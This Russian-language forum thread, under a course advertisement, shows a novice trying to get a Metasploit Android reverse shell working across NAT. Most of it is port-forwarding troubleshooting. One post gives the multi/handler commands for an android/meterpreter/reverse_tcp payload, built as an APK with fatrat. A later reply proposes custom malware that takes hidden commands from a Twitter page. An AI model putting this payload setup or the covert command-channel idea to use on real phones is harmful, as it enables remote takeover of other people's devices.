• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Проброс Kali за NAT

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
А если взять браузер и открыть локально? К примеру с браузера винды но тачки с Линукс порт по умолчанию 80
 

NigaMan

Member
11.01.2018
22
0
BIT
0
А если взять браузер и открыть локально? К примеру с браузера винды но тачки с Линукс порт по умолчанию 80
не понял, я должен в браузере в винде открыть этот файл через , так? если так, то не открывается
 

NigaMan

Member
11.01.2018
22
0
BIT
0
запустил, ввел ip получилось это
 

Вложения

  • Screenshot.png
    Screenshot.png
    29,5 КБ · Просмотры: 455

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
запустил, ввел ip получилось это

Мана тулкит была использована? Смысл в следующем - порты у тебя норм, а это фигня похоже от твоих исптыаний разных утилит для фишинга, которые ты не зачистил. Теперь, открываешь лист порта с метасплоит и делаешь проброс его, а свой телефон на андроид юзаешь через 3G и кидаешь на него свои заготовки и тестишь
 

NigaMan

Member
11.01.2018
22
0
BIT
0
Мана тулкит была использована? Смысл в следующем - порты у тебя норм, а это фигня похоже от твоих исптыаний разных утилит для фишинга, которые ты не зачистил. Теперь, открываешь лист порта с метасплоит и делаешь проброс его, а свой телефон на андроид юзаешь через 3G и кидаешь на него свои заготовки и тестишь
Теперь, открываешь лист порта с метасплоит и делаешь проброс его, про это можно поконкретнее?
 

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
Теперь, открываешь лист порта с метасплоит и делаешь проброс его, про это можно поконкретнее?


Все тоже самое как в локальной сети делал со своим андроидом и пробрось порт, ты же делал это с 80 и 9999
 

NigaMan

Member
11.01.2018
22
0
BIT
0
Все тоже самое как в локальнгй сети делал и пробрось порт, ты же делал это с 80 и 9999
то есть, я запустил апачи и теперь повторяю процедуру? и про порт я не понял слегка, просто этим всего неделю, от силы 2 занимаю, и еще не все до конца понимаю)
 

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
то есть, я запустил апачи и теперь повторяю процедуру? и про порт я не понял слегка, просто этим всего неделю, от силы 2 занимаю, и еще не все до конца понимаю)

Ты писал - что уже делал в локальнгой сети и все получилось с получением сессии. Откуда тут у тебя Апач? Ты на что принимаешь связь от запущенного файла с нагрузкой? И на какой порт? Вот на который порт ожидаешь в метиаплоите связь его и прокидывай
 

NigaMan

Member
11.01.2018
22
0
BIT
0
Ты писал - что уже делал в локальнгой сети и все получилось с получением сессии. Откуда тут у тебя Апач? Ты на что принимаешь связь от запущенного файла с нагрузкой? И на какой порт? Вот на который порт ожидаешь в метиаплоите связь его и прокидывай
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.**.**
set lport 9999
exploit -j
все прописал, скинул apk файл на телефон запустил, но сессия так и не появляется
apk файл я создаю с помощью fatrat
 

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
exploit -j
все прописал, скинул apk файл на телефон запустил, но сессия так и не появляется
apk файл я создаю с помощью fatrat


в роутере прописал что у тебя 9999 идет на 9999 ?

И еще - не факт файл сработает. Из 100 если 1 сработает уже хорошо.
 
A

a113

А то что IP может быть серый? (как у меня)
 
A

a113

вот скорее всего и у меня
Таким образом могу сказать: 1) купить у провайдера белый IP адрес. Тут очень много подводных камней и проблем
2) Написать свою малварь, которая будет брать команды из доверенного места и не будет вызывать подозрений. То есть будет коннектиться к, допустим, твиттеру, парсить страничку и искать на ней комманды, которые, к примеру, будут начинаться с OMG! а дальше /SlVTVCBBIFRFU1Q=/ и выполнять то, что в //. Так кстати передавали команды ботнету со страницы перис хилтон вроде :D
 
  • Нравится
Реакции: Ondrik8
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!